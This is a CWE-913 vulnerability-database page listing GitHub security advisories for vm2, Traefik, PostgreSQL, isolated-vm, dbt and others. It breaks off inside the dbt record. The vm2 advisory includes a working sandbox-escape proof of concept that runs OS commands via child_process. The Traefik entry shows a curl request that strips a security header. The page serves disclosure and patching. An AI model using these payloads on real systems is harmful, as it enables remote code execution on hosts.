Common Weakness Enumeration

CWE-913

Allowed-with-Review

Improper Control of Dynamically-Managed Code Resources

Abstraction: Class · Status: Incomplete

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.

159 vulnerabilities reference this CWE, most recent first.

GHSA-M25X-4J5X-R9V6

Vulnerability from github – Published: 2025-04-27 03:30 – Updated: 2025-04-27 03:30
VLAI
Details

In NASA CryptoLib before 1.3.2, the key state is not checked before use, potentially leading to spacecraft hijacking.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-46675"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-27T01:15:44Z",
    "severity": "LOW"
  },
  "details": "In NASA CryptoLib before 1.3.2, the key state is not checked before use, potentially leading to spacecraft hijacking.",
  "id": "GHSA-m25x-4j5x-r9v6",
  "modified": "2025-04-27T03:30:22Z",
  "published": "2025-04-27T03:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46675"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nasa/CryptoLib/pull/358"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nasa/CryptoLib/pull/359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nasa/CryptoLib/compare/v1.3.1...v1.3.2"
    },
    {
      "type": "WEB",
      "url": "https://securitybynature.fr/post/hacking-cryptolib"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M4WX-M65X-GHRR

Vulnerability from github – Published: 2026-05-29 17:50 – Updated: 2026-06-12 20:52
VLAI
Summary
vm2 has a CVE-2023-37903 patch bypass: nesting:true without explicit require still allows full RCE
Details

Summary

The fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in nodevm.js line 263 that blocks the combination nesting: true + require: false. However, the check uses strict equality (options.require === false), which is trivially bypassed by omitting the require option entirely.

When require is not specified, options.require is undefined, not false. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default require: requireOpts = false assigns requireOpts = false, producing the exact configuration the patch was designed to prevent.

Root Cause

// nodevm.js:263 — the security check
if (options.nesting === true && options.require === false) {
    throw new VMError('...');
}
// nodevm.js:280 — the default assignment (AFTER the check)
const { require: requireOpts = false } = options;
// When options.require is undefined:
//   - Line 263: undefined === false → FALSE → check skipped
//   - Line 280: requireOpts = false → same as require:false

Impact

Full Remote Code Execution on the host system. An attacker running code inside a NodeVM({ nesting: true }) sandbox (without specifying require) can:

  1. require('vm2') to get the vm2 library
  2. Construct an inner NodeVM with require: { builtin: ['child_process'] }
  3. Execute arbitrary OS commands via child_process.execSync

The inner VM is completely unconstrained by the outer sandbox configuration.

Reproduction

const { NodeVM } = require('vm2');

// nesting:true, require not specified (defaults to false AFTER the check)
const nvm = new NodeVM({ nesting: true });

const result = nvm.run(`
  const { NodeVM } = require('vm2');
  const inner = new NodeVM({
    require: { builtin: ['child_process'] }
  });
  module.exports = inner.run(
    "module.exports = require('child_process').execSync('id').toString()",
    'exploit.js'
  );
`, 'exploit.js');

console.log(result); // prints host uid/gid — full RCE

Suggested Fix

// Change the check to catch both false and undefined/omitted:
if (options.nesting === true && !options.require) {
    throw new VMError('...');
}

Or move the check after the destructuring default assignment:

const { require: requireOpts = false } = options;
if (options.nesting === true && !requireOpts) {
    throw new VMError('...');
}
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.11.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47137"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T17:50:22Z",
    "nvd_published_at": "2026-06-12T15:16:28Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in `nodevm.js` line 263 that blocks the combination `nesting: true` + `require: false`. However, the check uses strict equality (`options.require === false`), which is trivially bypassed by omitting the `require` option entirely.\n\nWhen `require` is not specified, `options.require` is `undefined`, not `false`. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default `require: requireOpts = false` assigns `requireOpts = false`, producing the exact configuration the patch was designed to prevent.\n\n## Root Cause\n\n```javascript\n// nodevm.js:263 \u2014 the security check\nif (options.nesting === true \u0026\u0026 options.require === false) {\n    throw new VMError(\u0027...\u0027);\n}\n// nodevm.js:280 \u2014 the default assignment (AFTER the check)\nconst { require: requireOpts = false } = options;\n// When options.require is undefined:\n//   - Line 263: undefined === false \u2192 FALSE \u2192 check skipped\n//   - Line 280: requireOpts = false \u2192 same as require:false\n```\n\n## Impact\n\nFull Remote Code Execution on the host system. An attacker running code inside a `NodeVM({ nesting: true })` sandbox (without specifying `require`) can:\n\n1. `require(\u0027vm2\u0027)` to get the vm2 library\n2. Construct an inner `NodeVM` with `require: { builtin: [\u0027child_process\u0027] }`\n3. Execute arbitrary OS commands via `child_process.execSync`\n\nThe inner VM is completely unconstrained by the outer sandbox configuration.\n\n## Reproduction\n\n```javascript\nconst { NodeVM } = require(\u0027vm2\u0027);\n\n// nesting:true, require not specified (defaults to false AFTER the check)\nconst nvm = new NodeVM({ nesting: true });\n\nconst result = nvm.run(`\n  const { NodeVM } = require(\u0027vm2\u0027);\n  const inner = new NodeVM({\n    require: { builtin: [\u0027child_process\u0027] }\n  });\n  module.exports = inner.run(\n    \"module.exports = require(\u0027child_process\u0027).execSync(\u0027id\u0027).toString()\",\n    \u0027exploit.js\u0027\n  );\n`, \u0027exploit.js\u0027);\n\nconsole.log(result); // prints host uid/gid \u2014 full RCE\n```\n\n## Suggested Fix\n\n```javascript\n// Change the check to catch both false and undefined/omitted:\nif (options.nesting === true \u0026\u0026 !options.require) {\n    throw new VMError(\u0027...\u0027);\n}\n```\n\nOr move the check after the destructuring default assignment:\n\n```javascript\nconst { require: requireOpts = false } = options;\nif (options.nesting === true \u0026\u0026 !requireOpts) {\n    throw new VMError(\u0027...\u0027);\n}\n```",
  "id": "GHSA-m4wx-m65x-ghrr",
  "modified": "2026-06-12T20:52:53Z",
  "published": "2026-05-29T17:50:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-m4wx-m65x-ghrr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47137"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/01a7552add345d5a6862623884e6b79a85bf0568"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/86ab819f202c3a8dad88cef5705f2e416c5188d7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 has a CVE-2023-37903 patch bypass: nesting:true without explicit require still allows full RCE"
}

GHSA-M54H-5X5F-5M6R

Vulnerability from github – Published: 2023-06-28 22:48 – Updated: 2023-06-30 20:25
VLAI
Summary
SpiceDB's LookupResources may return partial results
Details

Impact

Any user making a negative authorization decision based on the results of a LookupResources request with 1.22.0 is affected.

For example, using LookupResources to find a list of resources to allow access to be okay: some subjects that should have access to a resource may not. But if using LookupResources to find a list of banned resources instead, then some users that shouldn't have access may.

Generally, LookupResources is not and should not be used to gate access in this way - that's what the Check API is for. Additionally, version 1.22.0 has included a warning about this bug since its initial release.

Workarounds

Avoid using LookupResources for negative authorization decisions if using 1.22.0.

Patches

The only affected release is v1.22.0, and it is patched in v1.22.2 (there is no v1.22.1 release, though there is a git tag).

References

  • https://github.com/authzed/spicedb/pull/1397

For more information

If you have any questions or comments about this advisory: * Open an issue in SpiceDB * Ask a question in the SpiceDB Discord

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/authzed/spicedb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.22.0"
            },
            {
              "fixed": "1.22.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.22.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2023-35930"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-28T22:48:50Z",
    "nvd_published_at": "2023-06-26T20:15:10Z",
    "severity": "LOW"
  },
  "details": "### Impact\nAny user making a negative authorization decision based on the results of a LookupResources request with 1.22.0 is affected.\n\nFor example, using `LookupResources` to find a list of resources to allow access to be okay: some subjects that should have access to a resource may not. But if using `LookupResources` to find a list of banned resources instead, then some users that shouldn\u0027t have access may.\n\nGenerally, `LookupResources` is not and should not be used to gate access in this way - that\u0027s what the `Check` API is for. Additionally, version 1.22.0 has included a warning about this bug since its initial release.\n\n### Workarounds\nAvoid using `LookupResources` for negative authorization decisions if using `1.22.0`. \n\n### Patches\nThe only affected release is [v1.22.0](https://github.com/authzed/spicedb/releases/tag/v1.22.0), and it is patched in [v1.22.2](https://github.com/authzed/spicedb/releases/tag/v1.22.2) (there is no v1.22.1 release, though there is a git tag).\n\n### References\n- https://github.com/authzed/spicedb/pull/1397\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [SpiceDB](https://github.com/authzed/spicedb)\n* Ask a question in the [SpiceDB Discord](https://authzed.com/discord)\n",
  "id": "GHSA-m54h-5x5f-5m6r",
  "modified": "2023-06-30T20:25:41Z",
  "published": "2023-06-28T22:48:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/authzed/spicedb/security/advisories/GHSA-m54h-5x5f-5m6r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35930"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authzed/spicedb/pull/1397"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/authzed/spicedb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authzed/spicedb/releases/tag/v1.22.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SpiceDB\u0027s LookupResources may return partial results"
}

GHSA-M697-4V8F-55QG

Vulnerability from github – Published: 2021-08-05 17:04 – Updated: 2021-08-31 20:57
VLAI
Summary
Header dropping in traefik
Details

Impact

There exists a potential header vulnerability in Traefik's handling of the Connection header. Active exploitation of this issue is unlikely, as it requires that a removed header would lead to a privilege escalation, however, the Traefik team has addressed this issue to prevent any potential abuse.

Details

If you have a chain of Traefik middlewares, and one of them sets a request header Important-Security-Header, then sending a request with the following Connection header will cause it to be removed before the request was sent:

curl 'https://example.com' -H "Connection: Important-Security-Header" -0

In this case, the backend does not see the request header Important-Security-Header.

Patches

Traefik v2.4.x: https://github.com/traefik/traefik/releases/tag/v2.4.13

Workarounds

No.

For more information

If you have any questions or comments about this advisory, open an issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.4.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.7.30"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-32813"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-04T18:54:19Z",
    "nvd_published_at": "2021-08-03T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "# Impact\n\nThere exists a potential header vulnerability in Traefik\u0027s handling of the Connection header. Active exploitation of this issue is unlikely, as it requires that a removed header would lead to a privilege escalation, however, the Traefik team has addressed this issue to prevent any potential abuse.\n\n# Details\n\nIf you have a chain of Traefik middlewares, and one of them sets a request header `Important-Security-Header`, then sending a request with the following Connection header will cause it to be removed before the request was sent:\n\n```\ncurl \u0027https://example.com\u0027 -H \"Connection: Important-Security-Header\" -0\n```\n\nIn this case, the backend does not see the request header `Important-Security-Header`.\n\n# Patches\n\nTraefik v2.4.x: https://github.com/traefik/traefik/releases/tag/v2.4.13\n\n# Workarounds\n\nNo.\n\n# For more information\n\nIf you have any questions or comments about this advisory, [open an issue](https://github.com/traefik/traefik/issues).\n",
  "id": "GHSA-m697-4v8f-55qg",
  "modified": "2021-08-31T20:57:09Z",
  "published": "2021-08-05T17:04:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-m697-4v8f-55qg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32813"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/pull/8319/commits/cbaf86a93014a969b8accf39301932c17d0d73f9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.4.13"
    },
    {
      "type": "PACKAGE",
      "url": "github.com/traefik/traefik"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Header dropping in traefik"
}

GHSA-M7MV-M566-78J6

Vulnerability from github – Published: 2022-08-19 00:00 – Updated: 2022-08-20 00:00
VLAI
Details

A vulnerability found in postgresql. On this security issue an attack requires permission to create non-temporary objects in at least one schema, ability to lure or wait for an administrator to create or update an affected extension in that schema, and ability to lure or wait for a victim to use the object targeted in CREATE OR REPLACE or CREATE IF NOT EXISTS. Given all three prerequisites, the attacker can run arbitrary code as the victim role, which may be a superuser. Known-affected extensions include both PostgreSQL-bundled and non-bundled extensions. PostgreSQL blocks this attack in the core server, so there's no need to modify individual extensions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-2625"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-913",
      "CWE-915"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-08-18T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability found in postgresql. On this security issue an attack requires permission to create non-temporary objects in at least one schema, ability to lure or wait for an administrator to create or update an affected extension in that schema, and ability to lure or wait for a victim to use the object targeted in CREATE OR REPLACE or CREATE IF NOT EXISTS. Given all three prerequisites, the attacker can run arbitrary code as the victim role, which may be a superuser. Known-affected extensions include both PostgreSQL-bundled and non-bundled extensions. PostgreSQL blocks this attack in the core server, so there\u0027s no need to modify individual extensions.",
  "id": "GHSA-m7mv-m566-78j6",
  "modified": "2022-08-20T00:00:39Z",
  "published": "2022-08-19T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2625"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2022-2625"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2113825"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202211-04"
    },
    {
      "type": "WEB",
      "url": "https://www.postgresql.org/about/news/postgresql-145-138-1212-1117-1022-and-15-beta-3-released-2496"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M7RG-8WVQ-846V

Vulnerability from github – Published: 2021-06-07 21:49 – Updated: 2023-08-08 19:57
VLAI
Summary
Prototype pollution in nestie
Details

Prototype pollution vulnerability in 'nestie' versions 0.0.0 through 1.0.0 allows an attacker to cause a denial of service and may lead to remote code execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nestie"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-25947"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-06-04T18:32:41Z",
    "nvd_published_at": "2021-06-03T20:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Prototype pollution vulnerability in \u0027nestie\u0027 versions 0.0.0 through 1.0.0 allows an attacker to cause a denial of service and may lead to remote code execution.",
  "id": "GHSA-m7rg-8wvq-846v",
  "modified": "2023-08-08T19:57:34Z",
  "published": "2021-06-07T21:49:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25947"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lukeed/nestie/commit/bc80d5898d1e5e8a3d325d355eda0c325c8dcfc2"
    },
    {
      "type": "WEB",
      "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25947"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in nestie"
}

GHSA-MMHJ-4W6J-76H7

Vulnerability from github – Published: 2021-04-06 17:22 – Updated: 2021-03-30 22:27
VLAI
Summary
Misuse of `Reference` and other transferable APIs may lead to access to nodejs isolate
Details

Versions of isolated-vm before v4.0.0, and especially before v3.0.0, have API pitfalls which may make it easy for implementers to expose supposed secure isolates to the permissions of the main nodejs isolate.

Reference objects allow access to the underlying reference's full prototype chain. In an environment where the implementer has exposed a Reference instance to an attacker they would be able to use it to acquire a Reference to the nodejs context's Function object.

Similar application-specific attacks could be possible by modifying the local prototype of other API objects.

Access to NativeModule objects could allow an attacker to load and run native code from anywhere on the filesystem. If combined with, for example, a file upload API this would allow for arbitrary code execution.

To address these issues the following changes were made in v4.0.0: - Documentation was updated with more explicit guidelines on building secure applications. - Reference instances will no longer follow prototype chains by default, nor will they invoke accessors or proxies. - All isolated-vm API prototypes are now immutable. - NativeModule constructor may only be invoked from a nodejs isolate.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "isolated-vm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21413"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-30T22:27:45Z",
    "nvd_published_at": "2021-03-30T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "Versions of `isolated-vm` before v4.0.0, and especially before v3.0.0, have API pitfalls which may make it easy for implementers to expose supposed secure isolates to the permissions of the main nodejs isolate.\n\n`Reference` objects allow access to the underlying reference\u0027s full prototype chain. In an environment where the implementer has exposed a `Reference` instance to an attacker they would be able to use it to acquire a `Reference` to the nodejs context\u0027s `Function` object.\n\nSimilar application-specific attacks could be possible by modifying the local prototype of other API objects.\n\nAccess to `NativeModule` objects could allow an attacker to load and run native code from anywhere on the filesystem. If combined with, for example, a file upload API this would allow for arbitrary code execution.\n\nTo address these issues the following changes were made in v4.0.0:\n- Documentation was updated with more explicit guidelines on building secure applications.\n- `Reference` instances will no longer follow prototype chains by default, nor will they invoke accessors or proxies.\n- All `isolated-vm` API prototypes are now immutable.\n- `NativeModule` constructor may only be invoked from a nodejs isolate.",
  "id": "GHSA-mmhj-4w6j-76h7",
  "modified": "2021-03-30T22:27:45Z",
  "published": "2021-04-06T17:22:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/laverdet/isolated-vm/security/advisories/GHSA-mmhj-4w6j-76h7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21413"
    },
    {
      "type": "WEB",
      "url": "https://github.com/laverdet/isolated-vm/commit/2646e6c1558bac66285daeab54c7d490ed332b15"
    },
    {
      "type": "WEB",
      "url": "https://github.com/laverdet/isolated-vm/commit/27151bfecc260e96714443613880e3b2e6596704"
    },
    {
      "type": "WEB",
      "url": "https://github.com/laverdet/isolated-vm/blob/main/CHANGELOG.md#v400"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Misuse of `Reference` and other transferable APIs may lead to access to nodejs isolate"
}

GHSA-MRGP-MRHC-5JRQ

Vulnerability from github – Published: 2022-09-28 13:09 – Updated: 2022-09-28 13:09
VLAI
Summary
vm2 vulnerable to Sandbox Escape resulting in Remote Code Execution on host
Details

Impact

A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.

Patches

This vulnerability was patched in the release of version 3.9.11 of vm2

Workarounds

None.

References

Github Issue - https://github.com/patriksimek/vm2/issues/467 The file that was patched - https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71 The commit with the patch - https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164

For more information

If you have any questions or comments about this advisory: * Open an issue in VM2

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.9.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-36067"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-09-28T13:09:01Z",
    "nvd_published_at": "2022-09-06T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nA threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.\n\n### Patches\nThis vulnerability was patched in the release of version `3.9.11` of `vm2`\n\n### Workarounds\nNone. \n\n### References\nGithub Issue - https://github.com/patriksimek/vm2/issues/467\nThe file that was patched - https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71\nThe commit with the patch - https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [VM2](https://github.com/patriksimek/vm2)\n\n \n",
  "id": "GHSA-mrgp-mrhc-5jrq",
  "modified": "2022-09-28T13:09:01Z",
  "published": "2022-09-28T13:09:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36067"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/issues/467"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20221017-0002"
    },
    {
      "type": "WEB",
      "url": "https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 vulnerable to Sandbox Escape resulting in Remote Code Execution on host"
}

GHSA-P3F3-5CCG-83XQ

Vulnerability from github – Published: 2024-07-17 15:52 – Updated: 2024-11-18 16:26
VLAI
Summary
dbt has an implicit override for built-in materializations from installed packages
Details

Impact

What kind of vulnerability is it? Who is impacted?

When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it allows packages to extend and customize dbt's functionality. However, this also means that a malicious package could potentially override these components with harmful code.

Patches

Has the problem been patched? What versions should users upgrade to?

Fixed on 1.8.0, and patched for 1.6.14 and 1.7.14 releases.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Previously, a materialization defined in a package that shared a name with one of the built-in materializations would be preferred by default, without user action which is surprising and makes it more difficult to detect the insecure behaviour. We've changed the default behaviour to require explicit overrides by users in 1.8.0, and provided the ability to opt-out of built-in materialization overrides in 1.6 and 1.7 via the flags.require_explicit_package_overrides_for_builtin_materializations: False configuration in dbt_project.yml

Versions older than 1.6 are EOL.

References

Are there any links users can visit to find out more? * dbt documentation: https://docs.getdbt.com/reference/global-configs/legacy-behaviors#behavior-change-flags * https://www.elementary-data.com/post/are-dbt-packages-secure-the-answer-lies-in-your-dwh-policies * https://www.equalexperts.com/blog/tech-focus/are-you-at-risk-from-this-critical-dbt-vulnerability/ * https://tempered.works/posts/2024/07/06/preventing-data-theft-with-gcp-service-controls/

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "dbt-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.0"
            },
            {
              "fixed": "1.6.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "dbt-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.7.0"
            },
            {
              "fixed": "1.7.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-40637"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-89",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-17T15:52:57Z",
    "nvd_published_at": "2024-07-16T23:15:24Z",
    "severity": "LOW"
  },
  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nWhen a user installs a [package](https://docs.getdbt.com/docs/build/packages) in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it allows packages to extend and customize dbt\u0027s functionality. However, this also means that a malicious package could potentially override these components with harmful code.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nFixed on 1.8.0, and patched for 1.6.14 and 1.7.14 releases.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nPreviously, a materialization defined in a package that shared a name with one of the built-in materializations would be preferred by default, without user action which is surprising and makes it more difficult to detect the insecure behaviour. We\u0027ve changed the default behaviour to require explicit overrides by users in `1.8.0`, and provided the ability to opt-out of built-in materialization overrides in 1.6 and 1.7 via the `flags.require_explicit_package_overrides_for_builtin_materializations: False` configuration in `dbt_project.yml`\n\nVersions older than 1.6 are EOL.\n\n### References\n_Are there any links users can visit to find out more?_\n* dbt documentation: https://docs.getdbt.com/reference/global-configs/legacy-behaviors#behavior-change-flags\n* https://www.elementary-data.com/post/are-dbt-packages-secure-the-answer-lies-in-your-dwh-policies\n* https://www.equalexperts.com/blog/tech-focus/are-you-at-risk-from-this-critical-dbt-vulnerability/\n* https://tempered.works/posts/2024/07/06/preventing-data-theft-with-gcp-service-controls/",
  "id": "GHSA-p3f3-5ccg-83xq",
  "modified": "2024-11-18T16:26:52Z",
  "published": "2024-07-17T15:52:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dbt-labs/dbt-core/security/advisories/GHSA-p3f3-5ccg-83xq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40637"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dbt-labs/dbt-core/commit/3c82a0296d227cb1be295356df314c11716f4ff6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dbt-labs/dbt-core/commit/87ac4deb00cc9fe334706e42a365903a1d581624"
    },
    {
      "type": "WEB",
      "url": "https://docs.getdbt.com/docs/build/packages"
    },
    {
      "type": "WEB",
      "url": "https://docs.getdbt.com/reference/global-configs/legacy-behaviors#behavior-change-flags"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dbt-labs/dbt-core"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/dbt-core/PYSEC-2024-66.yaml"
    },
    {
      "type": "WEB",
      "url": "https://tempered.works/posts/2024/07/06/preventing-data-theft-with-gcp-service-controls"
    },
    {
      "type": "WEB",
